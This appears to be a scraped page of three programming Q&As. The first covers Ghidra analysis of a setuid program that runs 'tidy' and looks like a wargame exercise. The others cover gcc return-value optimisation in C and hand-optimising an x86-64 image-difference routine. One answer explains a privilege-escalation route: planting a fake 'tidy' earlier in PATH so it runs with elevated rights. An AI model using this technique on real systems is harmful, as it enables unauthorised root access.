00010bc3 83 c4 04 ADD ESP,0x4
LAB_00010bc6 XREF[3]: 00010b99(j), 00010ba8(j),
00010bb7(j)
00010bc6 b8 00 00 MOV EAX,0x0
00 00
LAB_00010bcb XREF[6]: 000109d8(j), 00010a0b(j),
00010a3a(j), 00010a61(j),
00010a86(j), 00010b0a(j)
00010bcb 8b 5d fc MOV EBX,dword ptr [EBP + local_8]
00010bce c9 LEAVE
00010bcf c3 RET
According to Ghidra, this decompiles to:
// Ghidra decompilation: feeds the file named in argv[1] through a child
// `tidy -asxml` process and reports XHTML validity based on tidy's exit code.
int main(int argc,char **argv)
{
__uid_t __euid;
__uid_t __ruid;
__gid_t __egid;
__gid_t __rgid;
int iVar1;
int __fd;
int iVar2;
__pid_t __pid;
ssize_t sVar3;
uint uVar4;
int status;
char c;
int pipefd [2];
pid_t pid;
int fd;
int in;
// Set both real and effective uid/gid to the effective ones (the usual
// setuid-binary pattern). NOTE(review): the return values of setreuid()
// and setregid() are not checked; on failure privileges stay unchanged.
__euid = geteuid();
__ruid = geteuid();
setreuid(__ruid,__euid);
__egid = getegid();
__rgid = getegid();
setregid(__rgid,__egid);
if (argv[1] == (char *)0x0) {
fwrite("Please specify the file to verify\n",1,0x22,stderr);
iVar1 = 1;
}
else {
// iVar1 = read-only fd of the file to verify (flags 0 == O_RDONLY).
iVar1 = open(argv[1],0);
if (iVar1 < 0) {
perror("open");
iVar1 = 2;
}
else {
// __fd = /dev/null opened read/write (flags 2 == O_RDWR); used to
// discard the child's stdout/stderr.
__fd = open("/dev/null",2);
if (__fd < 0) {
perror("open");
iVar1 = 5;
}
else {
// Pipe carrying the file contents from the parent to the child's stdin.
iVar2 = pipe(pipefd);
if (iVar2 < 0) {
perror("pipe");
iVar1 = 3;
}
else {
__pid = fork();
if (__pid < 0) {
perror("fork");
iVar1 = 4;
}
else if (__pid == 0) {
// Child: stdin <- pipe read end, stdout/stderr -> /dev/null.
dup2(pipefd[0],0);
dup2(__fd,1);
dup2(__fd,2);
close(pipefd[1]);
close(__fd);
close(iVar1);
// Searches PATH for "tidy" — with elevated uid/gid this is the
// classic PATH-hijack hazard discussed in the answer below.
execlp("tidy","tidy","-asxml",0);
perror("execlp");
iVar1 = 5;
}
else {
// Parent: copy the input file byte-by-byte into the pipe.
while( true ) {
sVar3 = read(iVar1,&c,1);
if (sVar3 == 0) break;
write(pipefd[1],&c,1);
}
close(pipefd[1]);
close(pipefd[0]);
close(__fd);
close(iVar1);
waitpid(__pid,&status,0);
// Extract the child's exit status byte (equivalent of WEXITSTATUS).
uVar4 = status >> 8 & 0xff;
if (uVar4 == 1) {
puts("Your file is not completely compliant");
}
else if (uVar4 == 2) {
puts("Your file contains errors");
}
else if (uVar4 == 0) {
puts("OK!");
}
else {
puts("I can\'t tell if your file is XHTML-compliant");
}
iVar1 = 0;
}
}
}
}
}
return iVar1;
}
It appears it is (to summarize) opening the file passed as the first argument using open in read only mode. If successful, it is forking and using the child process to execute tidy to validate the file is valid XHTML.
Nothing about it stands out to me as an obvious vulnerability that I can use here. I've looked into vulnerabilities for the tidy command, but wasn't really able to find anything useful for this.
Any help would be much appreciated!
In regular C code, execlp("tidy","tidy","-asxml",0); is incorrect as execlp() expects a null pointer argument to mark the end of the argument list.
0 is a null pointer when used in a pointer context, which this is not. Yet on architectures where pointers have the same size and passing convention as int, such as 32-bit linux, passing 0 or passing NULL generate the same code, so sloppiness does not get punished.
In 64-bit mode, it would be incorrect to do so but you might get lucky with the x86_64 ABI and a 64-bit 0 value will be passed in this case.
In your own code, avoid such pitfalls and use NULL or (char *)0 as the last argument for execlp(). In this listing, though, the binary is 32-bit, and in 32-bit mode passing 0 or (char *)0 produces the same code, so there is no problem here.
In your context, execlp("tidy","tidy","-asxml",0); shows another problem: it will look for an executable program with the name tidy in the current PATH and run this program as tidy with a command line argument -asxml. Since it changed the effective uid and gid, this is a problem if the program is setuid root because you can create a program named tidy in a directory appearing in the PATH variable before the system directories and this program will be run with the modified rights.
Another potential problem is the program does not check for failure of the system calls setreuid() and setregid(). Although these calls are unlikely to fail for the arguments passed, as documented in the manual pages, it is a grave security error to omit checking for a failure return from setreuid(). In case of failure, the real and effective uid (or gid) is not changed and the process may fork and exec with root privileges.

Disable named return value optimization in gcc for pure C

I failed to find a flag that controls the named return value optimization for C language. For C++ it seems to be -fno-elide-constructors.
The source code implementing it is here but since it is a middle-end, no front end information is spoiled even in comments. The manual section did not exactly help either. However disassembling shows that as it is turned off on O0 and enabled on O1 it must be one of the following:
-fauto-inc-dec
-fcprop-registers
-fdce
-fdefer-pop
-fdelayed-branch
-fdse
-fguess-branch-probability
-fif-conversion2
-fif-conversion
-finline-small-functions
-fipa-pure-const
-fipa-reference
-fmerge-constants
-fsplit-wide-types
-ftree-builtin-call-dce
-ftree-ccp
-ftree-ch
-ftree-copyrename
-ftree-dce
-ftree-dominator-opts
-ftree-dse
-ftree-fre
-ftree-sra
-ftree-ter
-funit-at-a-time
C code:
struct p {
long x;
long y;
long z;
};
__attribute__((noinline))
struct p f(void) {
struct p copy;
copy.x = 1;
copy.y = 2;
copy.z = 3;
return copy;
}
int main(int argc, char** argv) {
volatile struct p inst = f();
return 0;
}
Compiled with O0 we see that the 'copy' structure is naively allocated on stack:
00000000004004b6 <f>:
4004b6: 55 push rbp
4004b7: 48 89 e5 mov rbp,rsp
4004ba: 48 89 7d d8 mov QWORD PTR [rbp-0x28],rdi
4004be: 48 c7 45 e0 01 00 00 mov QWORD PTR [rbp-0x20],0x1
4004c5: 00
4004c6: 48 c7 45 e8 02 00 00 mov QWORD PTR [rbp-0x18],0x2
4004cd: 00
4004ce: 48 c7 45 f0 03 00 00 mov QWORD PTR [rbp-0x10],0x3
4004d5: 00
4004d6: 48 8b 45 d8 mov rax,QWORD PTR [rbp-0x28]
4004da: 48 8b 55 e0 mov rdx,QWORD PTR [rbp-0x20]
4004de: 48 89 10 mov QWORD PTR [rax],rdx
4004e1: 48 8b 55 e8 mov rdx,QWORD PTR [rbp-0x18]
4004e5: 48 89 50 08 mov QWORD PTR [rax+0x8],rdx
4004e9: 48 8b 55 f0 mov rdx,QWORD PTR [rbp-0x10]
4004ed: 48 89 50 10 mov QWORD PTR [rax+0x10],rdx
4004f1: 48 8b 45 d8 mov rax,QWORD PTR [rbp-0x28]
4004f5: 5d pop rbp
4004f6: c3 ret
Compiled with O1 it is not allocated but a pointer is passed as an implicit argument
00000000004004b6 <f>:
4004b6: 48 89 f8 mov rax,rdi
4004b9: 48 c7 07 01 00 00 00 mov QWORD PTR [rdi],0x1
4004c0: 48 c7 47 08 02 00 00 mov QWORD PTR [rdi+0x8],0x2
4004c7: 00
4004c8: 48 c7 47 10 03 00 00 mov QWORD PTR [rdi+0x10],0x3
4004cf: 00
4004d0: c3 ret
The closest thing to that in GCC (i.e. a switch for copy elision) is -fcprop-registers. Copy elision doesn't exist in C, but this is the most similar feature to that. From the man page:
After register allocation and post-register allocation instruction
splitting, we perform a copy-propagation pass to try to reduce
scheduling dependencies and occasionally eliminate the copy.
Enabled at levels -O, -O2, -O3, -Os.

Trying to optimize a subroutine in assembly

So I'm trying to optimize with pure assembly this C function that takes 2 images and outputs pixel by pixel its maximum difference in a grey scale:
// Infinity norm of two 3-channel pixels: the largest per-channel absolute
// difference. Operands are promoted to int, so the subtractions cannot wrap.
unsigned short infNorm(unsigned char x1, unsigned char y1, unsigned char z1, unsigned char x2, unsigned char y2, unsigned char z2 ){
    short dx = abs(x1 - x2);
    short dy = abs(y1 - y2);
    short dz = abs(z1 - z2);
    short m = (dx > dy) ? dx : dy;
    return (m > dz) ? m : dz;
}
// Per-pixel difference of two 4-byte-per-pixel images: the three colour
// channels of every output pixel are set to the infinity norm (max absolute
// channel difference) of the corresponding input pixels; alpha is forced to
// 255. m = pixels per row, n = rows, *_row_size = bytes per row per buffer.
void diff_c (unsigned char *src, unsigned char *src_2, unsigned char *dst, int m, int n, int src_row_size, int src_2_row_size, int dst_row_size) {
// Reinterpret the flat buffers as pointers to variable-length rows so the
// images can be indexed like 2-D matrices.
unsigned char (*src_matrix)[src_row_size] = (unsigned char (*)[src_row_size]) src;
unsigned char (*src_2_matrix)[src_2_row_size] = (unsigned char (*)[src_2_row_size]) src_2;
unsigned char (*dst_matrix)[dst_row_size] = (unsigned char (*)[dst_row_size]) dst;
unsigned char n1;
for(int y = 0; y < n; y++){
for(int x = 0; x < m; ++x ){
// Grey value = max absolute difference over the pixel's three channels.
n1 = infNorm(src_matrix[y][x*4], src_matrix[y][x*4+1], src_matrix[y][x*4+2],
src_2_matrix[y][x*4], src_2_matrix[y][x*4+1], src_2_matrix[y][x*4+2]);
dst_matrix[y][x*4] = n1; //blue
dst_matrix[y][x*4+1] = n1; //red
dst_matrix[y][x*4+2] = n1; //green
dst_matrix[y][x*4+3] = 255; //alpha
}
}
}
I did this using SIMD and got a function that is much faster than gcc's output at any optimization level. Now I wanted to do the same, but without using any SSE instructions. To that end I objdumped gcc's build and isolated the part containing these two functions (gcc -O3), to get an idea of what gcc was doing:
0000000000402280 <infNorm>:
402280: 40 0f b6 ff movzx edi,dil
402284: 0f b6 c9 movzx ecx,cl
402287: 40 0f b6 f6 movzx esi,sil
40228b: 29 cf sub edi,ecx
40228d: 45 0f b6 c0 movzx r8d,r8b
402291: 0f b6 d2 movzx edx,dl
402294: 89 f8 mov eax,edi
402296: 44 29 c6 sub esi,r8d
402299: 45 0f b6 c9 movzx r9d,r9b
40229d: c1 f8 1f sar eax,0x1f
4022a0: 44 29 ca sub edx,r9d
4022a3: 31 c7 xor edi,eax
4022a5: 29 c7 sub edi,eax
4022a7: 89 f0 mov eax,esi
4022a9: c1 f8 1f sar eax,0x1f
4022ac: 31 c6 xor esi,eax
4022ae: 29 c6 sub esi,eax
4022b0: 89 d0 mov eax,edx
4022b2: c1 f8 1f sar eax,0x1f
4022b5: 31 c2 xor edx,eax
4022b7: 29 c2 sub edx,eax
4022b9: 66 39 f7 cmp di,si
4022bc: 7e 12 jle 4022d0 <infNorm+0x50>
4022be: 66 39 d7 cmp di,dx
4022c1: 89 d0 mov eax,edx
4022c3: 0f 4d c7 cmovge eax,edi
4022c6: c3 ret
4022c7: 66 0f 1f 84 00 00 00 nop WORD PTR [rax+rax*1+0x0]
4022ce: 00 00
4022d0: 66 39 d6 cmp si,dx
4022d3: 89 d0 mov eax,edx
4022d5: 0f 4d c6 cmovge eax,esi
4022d8: c3 ret
4022d9: 0f 1f 80 00 00 00 00 nop DWORD PTR [rax+0x0]
00000000004022e0 <diff_c>:
4022e0: 45 85 c0 test r8d,r8d
4022e3: 0f 8e 05 01 00 00 jle 4023ee <diff_c+0x10e>
4022e9: 41 57 push r15
4022eb: 45 31 ff xor r15d,r15d
4022ee: 41 56 push r14
4022f0: 44 8d 34 8d 00 00 00 lea r14d,[rcx*4+0x0]
4022f7: 00
4022f8: 41 55 push r13
4022fa: 41 54 push r12
4022fc: 49 89 f4 mov r12,rsi
4022ff: 55 push rbp
402300: 48 89 fd mov rbp,rdi
402303: 53 push rbx
402304: 48 63 44 24 38 movsxd rax,DWORD PTR [rsp+0x38]
402309: 48 89 44 24 e8 mov QWORD PTR [rsp-0x18],rax
40230e: 49 63 c1 movsxd rax,r9d
402311: 48 89 44 24 f8 mov QWORD PTR [rsp-0x8],rax
402316: 48 63 44 24 40 movsxd rax,DWORD PTR [rsp+0x40]
40231b: 48 89 44 24 f0 mov QWORD PTR [rsp-0x10],rax
402320: 85 c9 test ecx,ecx
402322: 0f 8e a0 00 00 00 jle 4023c8 <diff_c+0xe8>
402328: 31 c0 xor eax,eax
40232a: 66 0f 1f 44 00 00 nop WORD PTR [rax+rax*1+0x0]
402330: 48 63 d8 movsxd rbx,eax
402333: 44 8d 58 01 lea r11d,[rax+0x1]
402337: 44 8d 50 02 lea r10d,[rax+0x2]
40233b: 41 0f b6 34 1c movzx esi,BYTE PTR [r12+rbx*1]
402340: 44 0f b6 4c 1d 00 movzx r9d,BYTE PTR [rbp+rbx*1+0x0]
402346: 4d 63 db movsxd r11,r11d
402349: 4d 63 d2 movsxd r10,r10d
40234c: 42 0f b6 7c 1d 00 movzx edi,BYTE PTR [rbp+r11*1+0x0]
402352: 47 0f b6 2c 14 movzx r13d,BYTE PTR [r12+r10*1]
402357: 41 29 f1 sub r9d,esi
40235a: 44 89 ce mov esi,r9d
40235d: c1 fe 1f sar esi,0x1f
402360: 41 31 f1 xor r9d,esi
402363: 41 29 f1 sub r9d,esi
402366: 43 0f b6 34 1c movzx esi,BYTE PTR [r12+r11*1]
40236b: 29 f7 sub edi,esi
40236d: 89 fe mov esi,edi
40236f: c1 fe 1f sar esi,0x1f
402372: 31 f7 xor edi,esi
402374: 29 f7 sub edi,esi
402376: 42 0f b6 74 15 00 movzx esi,BYTE PTR [rbp+r10*1+0x0]
40237c: 44 29 ee sub esi,r13d
40237f: 41 89 f5 mov r13d,esi
402382: 41 c1 fd 1f sar r13d,0x1f
402386: 44 31 ee xor esi,r13d
402389: 44 29 ee sub esi,r13d
40238c: 41 89 fd mov r13d,edi
40238f: 66 39 fe cmp si,di
402392: 44 0f 4d ee cmovge r13d,esi
402396: 66 44 39 ce cmp si,r9w
40239a: 41 0f 4c f1 cmovl esi,r9d
40239e: 66 41 39 f9 cmp r9w,di
4023a2: 41 0f 4e f5 cmovle esi,r13d
4023a6: 40 88 34 1a mov BYTE PTR [rdx+rbx*1],sil
4023aa: 42 88 34 1a mov BYTE PTR [rdx+r11*1],sil
4023ae: 42 88 34 12 mov BYTE PTR [rdx+r10*1],sil
4023b2: 8d 70 03 lea esi,[rax+0x3]
4023b5: 83 c0 04 add eax,0x4
4023b8: 44 39 f0 cmp eax,r14d
4023bb: 48 63 f6 movsxd rsi,esi
4023be: c6 04 32 ff mov BYTE PTR [rdx+rsi*1],0xff
4023c2: 0f 85 68 ff ff ff jne 402330 <diff_c+0x50>
4023c8: 41 83 c7 01 add r15d,0x1
4023cc: 4c 03 64 24 e8 add r12,QWORD PTR [rsp-0x18]
4023d1: 48 03 6c 24 f8 add rbp,QWORD PTR [rsp-0x8]
4023d6: 48 03 54 24 f0 add rdx,QWORD PTR [rsp-0x10]
4023db: 45 39 c7 cmp r15d,r8d
4023de: 0f 85 3c ff ff ff jne 402320 <diff_c+0x40>
4023e4: 5b pop rbx
4023e5: 5d pop rbp
4023e6: 41 5c pop r12
4023e8: 41 5d pop r13
4023ea: 41 5e pop r14
4023ec: 41 5f pop r15
4023ee: f3 c3 repz ret
So with this in mind, the idea — in contrast to what gcc was doing — was to avoid memory accesses as much as possible. Using something similar to gcc's output, I unrolled the loop one more time and wrote this:
; Hand-written replacement for diff_c, processing two 4-byte pixels per
; iteration. Arguments (SysV): rdi = src, rsi = src_2, rdx = dst,
; ecx = m (pixels per row), r8d = n (rows).
diff_asm:
push rbp
push r12
push r13
push r14
push r15
push rbx
sub rsp, 8
mov r15, rdx        ; save dst; mul below clobbers rdx
mov eax, r8d
mov ecx, ecx        ; zero-extend m into rcx
mul rcx             ; rax = n * m = total pixel count
mov rcx, rax
mov rdx, r15        ; restore dst pointer
.cicle:
cmp rcx, 0
; NOTE(review): rcx is decremented by 2 each pass, so this only hits zero
; when the total pixel count is even; an odd count would wrap rcx around.
je .tend
mov rbx, [rdi + rcx*4 - 8]  ; load two src pixels (8 bytes) at once
movzx r12, bl               ; channel 0 of pixel 1
shr rbx, 8
movzx r13, bl               ; channel 1 of pixel 1
shr rbx, 8
movzx r14, bl               ; channel 2 of pixel 1
shr rbx, 16                 ; skip alpha; bl is now channel 0 of pixel 2
mov r15, [rsi + rcx*4 - 8]  ; load two src_2 pixels
movzx rbp, r15b
shr r15, 8
movzx r8, r15b
shr r15, 8
movzx r9, r15b
shr r15, 16
call inf_norm               ; rax accumulates pixel 1's output bytes
movzx r12, bl               ; extract pixel 2 from what remains of rbx/r15
shr rbx, 8                  ; (inf_norm does not touch rbx or r15)
movzx r13, bl
shr rbx, 8
movzx r14, bl
shr rbx, 8
movzx rbp, r15b
shr r15, 8
movzx r8, r15b
shr r15, 8
movzx r9, r15b
shr r15, 8
call inf_norm               ; second call rotates both results into place
mov [rdx + rcx*4 - 8], rax  ; store both finished output pixels
sub rcx, 2
jmp .cicle
.tend:
add rsp, 8
pop rbx
pop r15
pop r14
pop r13
pop r12
pop rbp
ret
; Per-pixel infinity norm: max of the three per-channel absolute differences.
; Inputs (all clobbered):
;   r12 = x_1, r13 = y_1, r14 = z_1  (pixel from src)
;   rbp = x_2, r8  = y_2, r9  = z_2  (pixel from src_2)
; Output: the result byte three times plus an 0xFF alpha byte rotated into
; rax; after every second call the earlier pixel ends up in rax's low dword.
; rbx and r15 are deliberately left untouched for the caller's second pixel.
inf_norm:
sub r12d, ebp       ; x = x_1 - x_2
mov ebp, r12d
sar ebp, 0x1f       ; branchless abs: mask = x >> 31
xor r12d, ebp
sub r12d, ebp       ; r12d = |x|
sub r13d, r8d
mov r8d, r13d
sar r8d, 0x1f
xor r13d, r8d
sub r13d, r8d       ; r13d = |y|
sub r14d, r9d
mov r9d, r14d
sar r9d, 0x1f
xor r14d, r9d
sub r14d, r9d       ; r14d = |z|
cmp r12w, r13w
jg .z_y
cmp r13w, r14w      ; x <= y: result = max(y, z)
cmovl r13d, r14d
jmp .insert
.z_y:
cmp r12w, r14w      ; x > y: result = max(x, z)
mov r13d, r14d
cmovge r13d, r12d
.insert:
mov al, r13b        ; pack the result into rax one byte at a time; the four
ror rax, 8          ; ror-by-8 steps rotate rax by 32 bits in total, so the
mov al, r13b        ; new bytes land in the high dword and drop back into
ror rax, 8          ; the low dword on the next call
mov al, r13b
ror rax, 8
mov al, 255         ; alpha channel
ror rax, 8
ret
So now I find that my hand-made assembly routine is in some cases almost two times slower than gcc -O3/-O2, but for the life of me I can't work out why. Are the calls affecting the performance? Or is it the rotations? I wrote an implementation using shifts instead of rotates, but it was a bit slower than this one. Any help would be appreciated.

Resources